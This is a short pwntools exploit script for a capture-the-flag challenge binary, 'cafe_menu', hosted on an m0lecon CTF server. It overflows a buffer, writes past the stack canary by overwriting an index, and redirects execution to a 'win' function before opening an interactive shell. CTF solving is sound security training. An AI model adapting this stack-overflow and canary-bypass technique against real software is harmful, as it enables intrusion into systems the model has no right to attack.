23 lines
506 B
Python
23 lines
506 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
elf = context.binary = ELF("./cafe_menu", checksec=False)
|
|
|
|
BUF_LEN = 48
|
|
# CANARY_OFF = 50
|
|
AFTER_CANARY = 0x3F
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13563)
|
|
print(p.recvline())
|
|
# We can overwrite IDX to make it write on the stack after the canary position
|
|
payload = flat(
|
|
b"A" * 48,
|
|
b"\x3f", # After canary offset found
|
|
b"A" * 8, # Skip rbp
|
|
p64(0x401262), # win
|
|
b"\xff",
|
|
)
|
|
p.send(payload)
|
|
print(p.recvline())
|
|
p.interactive()
|